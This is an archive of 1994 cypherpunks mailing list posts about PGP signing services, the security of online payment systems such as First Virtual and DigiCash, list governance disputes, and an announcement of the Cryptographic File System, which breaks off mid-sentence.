PGP SIGNATURE----- Version: 2.6.2 iQBFAwUBLt91wioZzwIn1bdtAQE2CgF9Ex2jZda0xWQmUTd/I6S6H4CoE2ONRIf3 aifw1/ILoDc1QiBkExsW+YwCD8i7dXry =tiNs -----END PGP SIGNATURE----- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.] From warlord at MIT.EDU Fri Dec 2 11:27:11 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Fri, 2 Dec 94 11:27:11 PST Subject: Cypherpunks@hks.net service In-Reply-To: <9412021408.AA21731@yeti.bsnet> Message-ID: <9412021926.AA19667@toxicwaste.media.mit.edu> -----BEGIN PGP SIGNED MESSAGE----- To: dmandl at bear.com cc: cypherpunks at toad.com Subject: Re: Cypherpunks at hks.net service > No offense, but what's the point? What's next, automated key-signing > services? Is this just intended to help people who can't sign easily Actually, I've already written an automated key signing service. It is called PGPSign, and it uses Kerberos authentication to verify a request to sign a PGP key. It will match the Kerberos identity with the PGP UserID, and given some equivalence (which is a fuzzy thing to explain right now), it will either sign the key or refuse to sign the key. Jeff Schiller and I have written a paper which will be presented at the Winter Usenix conference on the topic, and we plan to make the code available, once I write some documentation for it! There is a good point to this. We are using the already-in-place Kerberos Infrastructure to generate an MIT Certification Authority. The MIT CA is a loose authorization, meaning that it assumes that only you have your password.. This solves the PGP web problem of needing everyone to sign everyone else's key. We plan to make the MIT Keysigner key widely distributed, and ask that everyone trust that key to sign other keys. - -derek -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBuAwUBLt906Th0K1zBsGrxAQEAGgLEDjk8s0CSXZULuhrytEQYhiWFA++qwzZE xMedY2vXFNUOkOzxoYwTpTopYUUOAse3bbPLtSfJYJAjnQtxetUiHBH/JmryXu6W Upu9KNqLZyotVJQarTOvxUA= =Nsm2 -----END PGP SIGNATURE----- From owner-cypherpunks at hks.net Fri Dec 2 11:34:37 1994 From: owner-cypherpunks at hks.net (owner-cypherpunks at hks.net) Date: Fri, 2 Dec 94 11:34:37 PST Subject: cypherpunk signing service Message-ID: <199412021939.OAA16569@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- In article <199412020736.CAA10394 at bb.hks.net>, wrote: >Does this look right? > >pub 384/27D5B76D 1994/12/01 Cypherpunk signing agent > Key fingerprint = 85 BA D4 6D B8 9D B6 B7 EB 74 11 48 42 45 61 F2 Yes, that's correct. >| I welcome any suggestions on the format of the message and the prepended >| message. > >Why not stealth it and just appear as if the sender signed it? Because the sender didn't sign it. I don't want to misrepresent what the service does. It guarantees messages have gone through cypherpunks at hks.net and, by implication, cypherpunks at toad.com. Nothing more, nothing less. >| Thanks for y'all's comments: keep 'em coming. > >Good work. Thanks! By the way, here's the server's key, signed by me: - - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.7 mQA9Ay7eB60AAAEBgOGkDzo6mkSp3G4W3EXwMWK8SrTVSmosuN5Y7Z2FdBS5uJ3o 1O0XNAwqGc8CJ9W3bQAFEbQuQ3lwaGVycHVuayBzaWduaW5nIGFnZW50IDxjeXBo ZXJwdW5rc0Boa3MubmV0PokAlQMFEC7fdxkTYYKL6zwe3QEBq3kEAJ9WxYXnOVXb yz8bTBJpKWhEVWXzpIq7ApDTjmK6e7GoF+FFsdy7ZTsNLpsDa0huijXRZJ9Fcvcx ioAQVHfNkXr6hFVxFkttztggKMlpzYtfUGnyiR+abgUUkVvEIfn0z5mzfbvnHLSa baZE6VrDFwa8Hnf2GVLLPOBkiLAGZTB0 =CHvA - - -----END PGP PUBLIC KEY BLOCK----- - -----BEGIN PGP SIGNATURE----- Version: 2.7 iQCVAwUBLt93aRNhgovrPB7dAQGRrAP9GS0HAa3zaCCKGUdpH3V+ur5i/YgF2Jxk wY8jlyXz/pazsv8GQw55Nl3bMKwGSkpng6aM9MNV1koGP5BBY1gw2gsVhzYi28QQ +ANreE32N3Rn0Kb2mH8WA88TG+bmWLH/Xs5ABGVIXO08VpLoJjrxuPaCxSBQYvGS XMBDrQ+P07o= =Cdif - -----END PGP SIGNATURE----- - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBFAwUBLt932SoZzwIn1bdtAQFZhQGAlORDYu6ulXfhEcIm8JUIcHJHHZKfwzfN 6HP4xRr9Q/0j9HtOkdoHRZ7QoiE2iFrr =ikLM -----END PGP SIGNATURE----- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.] From andrew_loewenstern at il.us.swissbank.com Fri Dec 2 12:06:34 1994 From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern) Date: Fri, 2 Dec 94 12:06:34 PST Subject: First Virtual? Message-ID: <9412022007.AA06523@ch1d157nwk> FV does in fact have a bunch of e-mail addresses that will auto-forward some info sheets to you. I have attached the info to this message. After having read Doug Barnes message (<9412021548.AA17294 at tadpole>) I'm glad I'm not the only one who thinks FV is a joke. The entire security of the system rests on the difficulty of intercepting and forging e-mail. Forging e-mail is dead easy, intercepting isn't much harder. While the implementors are correct that an online payment-system will have to be simple to use in order to gain wide acceptance, sacrificing all security for ease of use is a grave mistake. It just begging to be ripped off, providing people actually sell something via FV worth ripping off. andrew Begin forwared message: Where can I find out more about First Virtual? The First Virtual GENERAL INFORMATION FAQ is the best place to start if you are looking for information about First Virtual. It provides details about all the FAQ documents available via email, and about additional information available from our anonymous FTP and Gopher servers and our World Wide Web database. To receive a copy of the GENERAL INFORMATION FAQ, send an email message to "help at fv.com"; the GENERAL INFORMATION FAQ will be sent to you by email automatically. You can also find a copy in other places: * Connect to ftp.fv.com, our anonymous FTP server, and look in the directory /pub/docs for the file called "FAQ- general.txt". * Using Mosaic, Lynx, or another World Wide Web browser, connect to our Web page using the URL "http://www.fv.com". Look for the link to the "Frequently Asked Questions" page. Here's a summary of other First Virtual FAQ documents; to receive a copy by email, send a message to the specified address: * 1-2-3 FAQ -- Steps for getting started -- 123 at fv.com * SIGNUP FAQ -- Signing up for an account -- signup at fv.com * BACKGROUND FAQ -- Our company and our vision -- background at fv.com * BUYING FAQ -- Buying information -- buying at fv.com * SELLING FAQ -- Selling information -- selling at fv.com * INFOHAUS FAQ -- Using the Infohaus -- infohaus at fv.com * SECURITY FAQ -- Security issues -- security at fv.com * CASHFLOW FAQ -- Flow of money in our system -- cashflow at fv.com * PROBLEMS FAQ -- Dealing with problems -- problems at fv.com For information in languages other than English, send email to "international at fv.com". To help us provide our services to the public at the lowest possible cost, please search the FAQs before sending email to our human operators. Thanks for understanding. And welcome to First Virtual! From abostick at netcom.com Fri Dec 2 12:07:35 1994 From: abostick at netcom.com (Alan Bostick) Date: Fri, 2 Dec 94 12:07:35 PST Subject: DETWEILER IS SPOOFING US!!! In-Reply-To: <199412020516.AA02430@bolero.rahul.net> Message-ID: I absolutely LOVE good agitprop. This piece had me rolling on the floor with laughter. It's even better than the alt.syntax.tactical Attack FUD--err, FAQ. Thank you, Mr. Anonymous, your comedy has relieved a great deal of the tension, at least here. | For me, to be a feminist is to answer the Alan Bostick | question "Are women human?" with a yes. abostick at netcom.com | finger for PGP public key | Katha Pollitt, REASONABLE CREATURES Key fingerprint: | 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79 +legal_kludge=off From cactus at hks.net Fri Dec 2 12:11:53 1994 From: cactus at hks.net (cactus at hks.net) Date: Fri, 2 Dec 94 12:11:53 PST Subject: Disclaimer within signed body? Message-ID: <199412022016.PAA16908@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- It's been suggested that I put my "signature disclaimer" within the signed block. There are several pluses and minuses to this, and I wanted to see what others think (As an aside, by the way, I think the aesthetics of the output are important). As Eric pointed out to me last night, in general it's bad to modify the body of a message. I think that what I've been doing is fine, as the clear distinction betweem original message and additional stuff is maintained. However: the disclaimer should really be bound to the signature. Using the "comment" block won't do this, since PGP does not use it as part of the signature. Additionally, people whose software runs the messages through PGP will never see the disclaimer if it's outside of the signed block. What are folks' opinions on this? My options are: - Do nothing. Memory and the general appearance of the disclaimer are enough that people won't be fooled by a message with a removed disclaimer. - Put the disclaimer within the signature block. In essence, doing nothing as above, but that's what the comment block is there for and it might look nicer. - Put the disclaimer at the top of the signed body. Ugly, since it immediately forces its presence in a message, but effective for the same reason. - Put the disclaimer at the bottom of the signed body. It's still modifying the signed body, but in a much less obtrusive manner. Input? - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBFAwUBLt+AfCoZzwIn1bdtAQF0uQF/R2+Wc4tKXs0/+Qc79ln01EUOT8seW4wC tKLa8H8CGAI33Exh/FeMvtYjnUEdPcXL =5852 -----END PGP SIGNATURE----- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.] From rishab at dxm.ernet.in Fri Dec 2 12:27:03 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Fri, 2 Dec 94 12:27:03 PST Subject: Voice over data Message-ID: Eric Hughes wrote: > the great voice-over-data protocols and products introduced by > Intel, Rockwell, ZyXEL and others at Comdex which will make > Voice-PGP so much easier > > As I understand these voice-over-data products, the voice goes over > analog, added to the modem signal. The modem signal is interpreted, > and then reconstructed and subtracted from the incoming signal, > leaving voice. Very clever, but insufficient for secure phones. I don't think that's how they do it. As far as I know, most methods multiplex digitized audio with the data. One system used by some people in India provides a dynamic combination of fax, (digitized) voice and data, depending on the throughput - eg vox/9.6 data if 14.4kbps, fax as well if 19.2, etc. While Intel and others are proposing standards, ZyXEL does it with software along with a voice card or possibly RJ11 input. A friend of mine saw a demo of it at Comdex, on an old 1496E (16.8 kbps zyxel to zyxel). The new v.34 does 28.8k - lots of room for clear digitized voice and high speed data. This is exactly why I thought it would make secure voice easier, if not secure phones (who wants to lug a modem and PC around as a 'handset'?). I'll be testing some Onetics Rad VFAST modems this week, which apparently do digitized voice over v.34 as well. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "Clean the air! clean the sky! wash the wind! rishab at dxm.ernet.in take stone from stone and wash them..." rishab at arbornet.org Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Fri Dec 2 12:27:04 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Fri, 2 Dec 94 12:27:04 PST Subject: Digicash trial Message-ID: Geoffrey Faivre-Malloy > DigiCash trial? Tell me more! I got my account a couple of weeks ago, I just downloaded the software. (I'm a buyer, though I was hoping to sell too.) Recent 'shops' include HotWired. I suspect one of the problems is that the software is not 'licensed for use in the US' possibly for patent reasons? It says this clearly in the pre-download license agreement. The trial gives you 100 dummy units of currency, which you can use to 'buy' from 'shops'. > Now THAT sounds cool! :) Wonder how long it will be before someone uses > PGP in a phone :) How much processing power would it take to do that on > the fly anyway? Actually not too much - PGP can process fast enough on a 486 as it is. > > Now what _I_ want is some way to integrate PGP with Netscape... > What's Netscape? The 'new improved' commercial version of Mosaic, by those who left to form a company. The freeware version of Netscape is probably the best WWW browser for a number of platforms right now. Of course, PGP wouldn't be integrated with Netscape as such, but into a local Web page - I'm looking at Web pages as simple interfaces to various ordinary, not necessarily 'netted' tasks. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "Clean the air! clean the sky! wash the wind! rishab at dxm.ernet.in take stone from stone and wash them..." rishab at arbornet.org Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From anonymous-remailer at shell.portal.com Fri Dec 2 13:04:56 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 2 Dec 94 13:04:56 PST Subject: VOTE NO! Message-ID: <199412022104.NAA17526@jobe.shell.portal.com> On mandatory sigs: I personally don't fathom the idea (as some of you do), I've always perceived PGP(Tm) as something I would use when I really had something sensitive to send a friend, or when I was making a public announcement to a mailing list or newsgroup. But to use it to sign EVERY single piece of mail I send to cypherpunks is asking a lot from me as my setup is very similar to Tim Mays', and I don't want to be singled out because of it! I think the list should proceed as it has since its formation, and subscribers should just sign their messages as they see fit. I know I'm not posting anything new, but considering the torrential flood of trash that Detweiler posted, it's not that much of a waste. :-)= Good evening. From sleas at d.umn.edu Fri Dec 2 13:44:04 1994 From: sleas at d.umn.edu (shawn leas) Date: Fri, 2 Dec 94 13:44:04 PST Subject: ERIK HUGHES: EGOTISTICAL PRICK Message-ID: <199412022147.PAA00699@mwah177sf.d.umn.edu> -----BEGIN PGP SIGNED MESSAGE----- shawn leas writes: > > In article <199412020536.VAA08584 at jobe.shell.portal.com>, > > wrote: > > >this is BS!!!! let's find a NEW LIST. a list is a COMMUNITY > > >PROPERTY. anyone who pulls this kind of prickery, insinuating > > >they are in the "bully pulpit", deserves > > >CYPERSPATIAL EXCOMMUNICATION for HIGH TREASON TO THE CYPHERPUNK > > >CAUSE of TOTAL AUTONOMY FOR THE INDIVIDUAL. > > I list is not 'community' property. Just like if you tryed to say that > my money was your community's property (Clinton supporters) I'd probably > cut your head off. Eric has full rights to go so far as to kick you off > if he feels fit. Or me, for that matter. Whatever, it's HIS LIST. I clipped the wrong line and made it look like I was replying to a guy who was replying to the original guy. A public apology is in order, because noone deserves to be associated with the dick who flamed Eric. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt+V1aZRyOzqm29xAQECMgP/d0BDw40DVx9LJ4+BBGAHXiIb0D1mGnK3 3HVU01f3tE0AZ6iZnsTK+jg3K22szCXo1e6QoMjyqWIWsF7H1Bj+H/iEHF5rjp9l krbBExPG88Q4qnAm5kgEVpWK0z0L7uBe8EU1ni+UaD1VXSUM8EM1hjehFzEfwRJM /ZXSDNCV8Wc= =P72R -----END PGP SIGNATURE----- From JLICQUIA at mhc.uiuc.edu Fri Dec 2 13:50:09 1994 From: JLICQUIA at mhc.uiuc.edu (JEFF LICQUIA (CEI)) Date: Fri, 2 Dec 94 13:50:09 PST Subject: Term Emulators (was Re: public accounts / PGP / passphrases) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > From: Adam Shostack > Derek wrote: > > | It would be nice to integrate PGP into terminal emulators, too, like > | kermit or seyon or red ryder or whatever, so that you could easily use > | PGP locally to sign/encrypt things on the remote end. Wishful > | thinking, I guess... > > I think terminal emulators are the wrong layer for PGP > integration. PGP support is needed in document editors and viewers, > rather than in network layers. I think you misunderstood. I took Derek as saying that 'modem programs' (as in the Procomm/Crosstalk kind) should have PGP integration. If these truly provided a full-featured network, then yes, the focus would need to be on the local editors/viewers we'd all use. As it is, these programs only provide a narrow window into a far-off environment, with varying degrees of security. As a positive proposal, I noticed Greg Broiles's posts with the scripts and came up with an idea. Would it be possibly a step forward to write similar scripts to allow for local agency? I envision two stages here: 1. Scripts on the remote end substituting for your editor that actually run your editor, then ask (once you're done with the plaintext) whether you'd like to process the message locally. If so, it would send the file via sz, wait for a Enter: press, then rz the file back, substituting the rz'd file for the original. You'd still have to mess with files on the local end, though. 2. Local control of the term emulator to automate the local agency part of the transaction. > With direct ip connectivity becoming commonplace, we're seeing > PGP integrated into mail & news tools, which is a great thing. (There > is also a use for encrypting networks, but I think it is different > from the use for PGP, which is a document oriented system.) True. However, the plight of the poor user who must use dial-up to connect is still one where all the agency must happen on the other end of the wire. I don't think these are going to go away any time soon, and by the time they do, we'll probably all have moved on to some new GeeWhizBang system developed commercially (my guess is it'll come out about a year after the RSA patent expires... :-) and integrated via OLE4 into our Windows 5.2 messaging systems (whoops! sorry, Tim, I meant via AppleMindMeld into our System 9.3 messaging systems :-). -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt+VqDER5KvPRd0NAQG2JQQAk3dLJW+eoHxqJZbE8Ofcf/oNg7zOgrAJ zjpKwmM6PNFMsvsiI84jBkENHBhaItIMtuPCh+RCR6lS7JVaoAIlLOJ3e+5Kb8uM B9nrZ9BMzro275wjC1Ubmh2+hLtSVRVU0lqoGi7JiEv/fSWdlBCXdLqztiVsMvn5 fMBPqQY07o8= =InPY -----END PGP SIGNATURE----- From werewolf at io.org Fri Dec 2 13:59:11 1994 From: werewolf at io.org (Mark Terka) Date: Fri, 2 Dec 94 13:59:11 PST Subject: First Virtual? In-Reply-To: <9412022007.AA06523@ch1d157nwk> Message-ID: On Fri, 2 Dec 1994, Andrew Lowenstern wrote: > FV does in fact have a bunch of e-mail addresses that will auto-forward some > info sheets to you. I have attached the info to this message. > > After having read Doug Barnes message (<9412021548.AA17294 at tadpole>) I'm glad > I'm not the only one who thinks FV is a joke. The entire security of the > system rests on the difficulty of intercepting and forging e-mail. Forging > e-mail is dead easy, intercepting isn't much harder. While the implementors > are correct that an online payment-system will have to be simple to use in > order to gain wide acceptance, sacrificing all security for ease of use is a > grave mistake. It just begging to be ripped off, providing people actually > sell something via FV worth ripping off. > Ok, so what are our options, given that this company seems to think of security in terms of a plastic padlock. From corresponding posts on the list, the only other alternative, Digicash, doesn't seem to be too responsive to anyone's participation right now. -------------------------------------------------------------------------- Mark Terka | werewolf at io.org | public key (werewolf) by Toronto,Canada | dg507 at cleveland.freenet.edu | public key server or request --------------------------------------------------------------------------- From lmccarth at ducie.cs.umass.edu Fri Dec 2 14:27:27 1994 From: lmccarth at ducie.cs.umass.edu (lmccarth at ducie.cs.umass.edu) Date: Fri, 2 Dec 94 14:27:27 PST Subject: He's the Big Kahuna Message-ID: <199412022232.RAA18078@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Tim May writes: > Eric Hughes wrote: > > Someone else wrote: > > > I'd feel just about as strange (I hope) if people were saying "Look, > > > Tim's the boss. He's the Big Kahuna. If you don't like his policies on > > > his list, leave." > > "This is one _tasty_ burger" > Something to do with the metric system? Security through obscurity. - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLt+fJ2f7YYibNzjpAQEWRAP/d0dYaMQf0R4XZZRuIwW8kzqZj8p/27XA +TDupyHkn2Bpu/02JziAccWbRVLyA8XgVwN69Su1TBrqhRTEI8cQZG7jC/WJ4HHl iYV50CnKyoz3d5peAowI14BD6x7EnJkR70TomnyEsxQhK60E1VDpZDrxV2EsGqNI n9PQpw6SCPg= =woV8 - -----END PGP SIGNATURE----- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBFAwUBLt+gXyoZzwIn1bdtAQFQMwF/YbIgSqTwy1c2dGhbGPvZD226C1jgPDfU 6RSkqzK1nRujQfC8CMuaOlHW9/HjC3S9 =Wb4P -----END PGP SIGNATURE----- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.] From hfinney at shell.portal.com Fri Dec 2 14:27:40 1994 From: hfinney at shell.portal.com (Hal) Date: Fri, 2 Dec 94 14:27:40 PST Subject: First Virtual? In-Reply-To: Message-ID: <199412022227.OAA00747@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- Mark Terka writes: >Ok, so what are our options, given that this company seems to think of >security in terms of a plastic padlock. From corresponding posts on the >list, the only other alternative, Digicash, doesn't seem to be too >responsive to anyone's participation right now. Allow me then to repost this, a summary of how some available payment systems work. It is oriented towards remailers but has info and pointers to several payment systems. - From owner-cypherpunks at toad.com Sat Oct 29 09:35:38 1994 Date: Sat, 29 Oct 1994 09:31:27 -0700 From: Hal Message-Id: <199410291631.JAA27105 at jobe.shell.portal.com> X-To: cypherpunks at toad.com Subject: Payment systems for remailers This is an edited version of a posting I made to remailer-operators at c2.org, discussing how some of the various payment systems which have recently been introduced on the net might be used to support a for-pay remailer. First I discussed some motivation, such as improving the quality of service and discouraging spam attacks, then this was the part about the various services. If anyone knows of other alternatives please let me know. I know of two systems that are VISA/Mastercard based. One is called First Virtual (http://www.fv.com). They are oriented towards information sales and say that they aren't for service providers, but in practice it looked to me like they could be used for services. When a customer wants to pay, he sends you his FV ID. You send this to FV and they send an email message to the customer asking whether he authorizes the payment. If he says "yes", FV credits your account. You get a check every month. Customers who always say "no" get booted out of the system (as do merchants who submit bogus bills). They charge 29 cents plus 2 percent per transaction, but merchants can batch up multiple orders by a single customer before sending it in. There are a few problems with a system like this, many of which are somewhat generic to our situation. The most fundamental is that we don't know who our customers are much of the time. In fact, the whole point of the remailer network is that we not know that fact for any case except the first hop in the chain. If we required customers to expose their FV account ID at every hop, it would make it a lot easier to track messages through the network (even if the ID's were hidden in the encryption envelope it seems risky). If we then sent a message to FV saying that we needed to charge ID XXX, and FV responds with an email to the person's home address, this offers more possibilities for tracing. One solution would be only to charge on entry into the remailer net. Perhaps remailer operators would even charge each other then, and the first remailer would charge some larger amount to deal with a "typical" chain length? Many interesting possibilities here. Another issue is that the overhead charges by FV would require batching up messages before submitting them. Let me make clear that the batch must consist all of charges to a single user. It doesn't do any good to send one message to FV asking them to please charge a penny to each of 100 VISA accounts. No, you would have to count messages from each user, separately, and when user XXX had sent, say, $1 worth of messages, you could send in the request to FV and get back 70 or so cents. So this adds some overhead and record-keeping that we don't currently have to do, although perhaps it is not so difficult. But it would raise new questions of authenticating FV ID's, and shares some of the negative privacy impacts and message linking issues mentioned above. The other VISA based system is called OpenMarket. I just read about it tonight so I don't know it as well (http://www.openmarket.com). It is pretty tied to the WWW so it would not seem to work for us. Customers get connected to a particular WWW server which authenticates them and charges their VISA card appropriately, then they get redirected to the merchant with some kind of token that says they have paid. The NetBank (email to netbank-intro at agents.com) is a digital-cash like system. Customers get tokens which are basically large secret numbers which have a cash value. They send them to the merchants, and the merchants then send them to the bank which credits their account. The NetBank sends you a check every month. The interesting thing is how customers buy the cash tokens. One way is by connecting to a 900 number with your modem. They charge the customer $10.00 and give him a digital cash token worth that much. Another way is by faxing a check to them. I wasn't clear on how you get the cash token back in that case; I guess they email it to you at an address you specify. From the privacy point of view, these are not that great; 900 numbers have Automatic Number Identification so unless you are willing to tramp out to a pay phone to get your cash then it could be linked to your phone number. And the fax system must have some kind of return address that would link to you. The other problem with NetBank is that the smallest denomination which can be spent is 25 cents. Due to the cash-like nature of the tokens, I don't see a natural way to accumulate several messages into one payment. Maybe we could layer our own low-value digital cash system on top of NetBank, where users could buy our anonymous cash for 25 cents and get enough tokens for 25 messages, then we would settle amongst ourselves (or actually with the anon-mail-token bank). Actually this might help with the privacy problems, too. Anonymous digital cash is heavily patented, though. With a cash-like system, each message would include a numeric token in the header which is the digital cash. The remailer would strip that out and send it in for credit. This is a simple system and could be largely automatic. However there are some tricky issues about cheaters re-using cash. NetBank charges $4 per month, plus, for the 900-number-based cash, 20% off of face value. The last system I'll describe is David Chaum's DigiCash (http://www.digicash.com). Chaum is the inventor of digital cash and he certainly knows his stuff, plus as I said he has the intellectual property pretty well sewed up patent-wise. The DC payment system is also WWW based at present. The customer has to be running a special program on his computer, separate from his web browser. This program holds his digital cash, which is similar conceptually to the NetBank cash but more sophisticated cryptographically. When he wants to buy something, the merchant's web server makes a connection to the customer's DC program, and it transfers the cash to the merchant. DigiCash says they are planning an email based system but for now their emphasis is on the WWW. Right now they are only in beta and not using real money. I don't know when they will be real and email based, and I don't know if they have said what their commission will be. But when this comes up it may be the best approach if small-value transactions can be supported. DigiCash is fully anonymous in the sense that once a customer receives the money, it is "blinded" in a special cryptographic way so that the bank cannot associate it with that customer (and no one else can, either). This kind of anonymity fits in very well with our remailer requirements. Well, I know this is a lot of information to work through, but mostly I want people to be aware of the possibilities. Most of this stuff is very, very new, only weeks old, generally. Probably over the next few months we will see a lot more options appear. I am confident that there will soon be payment systems that would provide the technical basis for fee based remailing. I don't expect anyone to get rich by this, but it might help compensate for the risks we all face, and it might serve to improve the quality of the remailer network. Hal Finney hfinney at shell.portal.com -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLt+fKxnMLJtOy9MBAQG8ZgIAoBMb4Tctn56LUV1RnIkh4ENPYwTVz4Fn b+k2Nl6hPN2UP+llyJHXDS8WTTHUAJ6rzM3oNMDtZcAXRJMBgNmPTg== =hZYK -----END PGP SIGNATURE----- From andrew_loewenstern at il.us.swissbank.com Fri Dec 2 14:32:23 1994 From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern) Date: Fri, 2 Dec 94 14:32:23 PST Subject: First Virtual? Message-ID: <9412022231.AA06560@ch1d157nwk> Mark Terka writes: > Ok, so what are our options, given that this company seems to think > of security in terms of a plastic padlock. From corresponding posts > on the list, the only other alternative, Digicash, doesn't seem to > be too responsive to anyone's participation right now. It seems to me that DigiCash mistakenly 'jumped the gun' and announced before they were truly ready to test. This is such a common ocurrance in the computer industry that I'm suprised people are making noise over it. However, it indicates their reluctance to ship something before it's ready, which is good considering the technical and political challenges of the task they are undertaking. How can you really compare the proposed DigiCash systems versus FirstVirtual? One is a 'toy' system for moving credit card numbers around without actually broadcasting them in the clear, the other is a cryptographically secure digital cash type system. It's not suprising that FirstVirtual is ready sooner than DigiCash. However, assuming each system was ready and working as advertised, which would you trust for your financial transactions? With the possibility of millions and billions of dollars of commerce ocurring on the net in the near future, which do you think most people will want to use? While FirstVirtual may have it's place in the world of online payment systems, it is IMHO no replacement for a real digital cash system. The fact that most of the people who have even heard of these new payment systems are unaware of the not so subtle differences should alarm most cypherpunks. Digital cash isn't going to happen overnight (although most of us would like it to), and the last thing we want is for systems like FirstVirtual to become the de facto standard for online payment... andrew From rfb at lehman.com Fri Dec 2 15:15:14 1994 From: rfb at lehman.com (Rick Busdiecker) Date: Fri, 2 Dec 94 15:15:14 PST Subject: Mighty morphing power cypherpunks In-Reply-To: <199412020315.TAA20817@netcom8.netcom.com> Message-ID: <9412022313.AA09532@cfdevx1.lehman.com> From: "James A. Donald" Date: Thu, 1 Dec 1994 19:15:35 -0800 (PST) So autonag every nym to send a public key in. Where do you send the autonag message? Do you trust the From: or Reply-To: fields? Rick From jamesd at netcom.com Fri Dec 2 15:33:12 1994 From: jamesd at netcom.com (James A. Donald) Date: Fri, 2 Dec 94 15:33:12 PST Subject: Mighty morphing power cypherpunks In-Reply-To: <9412022313.AA09532@cfdevx1.lehman.com> Message-ID: <199412022333.PAA12885@netcom8.netcom.com> Rick Busdiecker writes > > From: "James A. Donald" > Date: Thu, 1 Dec 1994 19:15:35 -0800 (PST) > > So autonag every nym to send a public key in. > > Where do you send the autonag message? Do you trust the From: or > Reply-To: fields? It does not matter who the true identity associated with a public key is. My proposal is only that signatures be checked for consistent identity, not true name. Requiring true names would be most uncypherpunk. So it would be up to the nym to get his true public key to the list, not up to the list to discover the correct public key that signs a posting by a nym. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at acm.org From rfb at lehman.com Fri Dec 2 15:34:08 1994 From: rfb at lehman.com (Rick Busdiecker) Date: Fri, 2 Dec 94 15:34:08 PST Subject: Why nothing works [Was: Mandatory sig workaround] In-Reply-To: <199412020330.TAA05366@netcom10.netcom.com> Message-ID: <9412022332.AA09718@cfdevx1.lehman.com> From: "Timothy C. May" Date: Thu, 1 Dec 1994 19:30:58 -0800 (PST) > 3. Tim: "I don't want to have to download mail for processing. I > want to be able to do it all on Netcom's machine." A fair summary of the situation. And I consider the slight benefits of signing to not be worth the effort of changing the tools I have managed to get working over the past couple of years. I think that solution is clear: Buy your own netcom. You don't need the size, so just buy a 486 and a domain name (cypherpunks.org?). Then, hire a CP hacker to Linuxize the 486, slip/ppp it to some provider, and hook-up premail et al. Anyone selling Linux support contracts yet? You can continue to do what you currently do on your Mac. You'll just be tcmay at cypherpunks.org instead of tcmay at netcom.com and you'll have some crypto bells and whistles that you didn't have before. Rick From mab at research.att.com Fri Dec 2 16:26:58 1994 From: mab at research.att.com (Matt Blaze) Date: Fri, 2 Dec 94 16:26:58 PST Subject: New version (1.2) of CFS now available Message-ID: <9412022305.AA18396@merckx.info.att.com> Source code for the latest version of CFS (release 1.2), the Cryptographic File System, is now available upon request for research and experimental use in the US and Canada. CFS pushes encryption services into the Unix(tm) file system. It supports secure storage at the system level through a standard Unix file system interface to encrypted files. Users associate a cryptographic key with the directories they wish to protect. Files in these directories (as well as their pathname components) are transparently encrypted and decrypted with the specified key without further user intervention; cleartext is never stored on a disk or sent to a remote file server. CFS employs a novel combination of DES stream and codebook cipher modes to provide high security with good performance on a modern workstation. CFS can use any available file system for its underlying storage without modification, including remote file servers such as NFS. System management functions, such as file backup, work in a normal manner and without knowledge of the key. CFS runs under SunOS and several other BSD-derived systems with NFS. It is implemented entirely at user level, as a local NFS server running on the client machine's "loopback" interface. It consists of about 5000 lines of code and supporting documentation. You must have "root" access to install CFS. CFS was first mentioned at the work-in-progress session at the Winter '93 USENIX Conference and was more fully detailed in: Matt Blaze, "A Cryptographic File System for Unix", Proc. 1st ACM Conference on Computer and Communications Security, Fairfax, VA, November 1993. (PostScript available by anonymous ftp from research.att.com in the file dist/mab/cfs.ps.) and in Matt Blaze, "Key Management in an Encrypting File System", Proc. Summer '94 USENIX Tech. Conference, Boston, MA, June 1994. (PostScript available by anonymous ftp from research.att.com in the file dist/mab/cfskey.ps.) The new version differs from the version described in the papers in a few ways: * The encryption scheme has been strengthened, and now provides greater security but with the online latency of only single-DES. * Support for the smartcard-based key management system is not included and a few of the tools are not included. * The performance has been improved. * The security of the system against certain non-cryptanalytic attacks has been improved somewhat. * User-contributed ports to a number of additional platforms. * Hooks for adding new ciphers. * 3-DES and MacGuffin encryption options. * Timeout options allow automatic detach of encrypted directories after a set 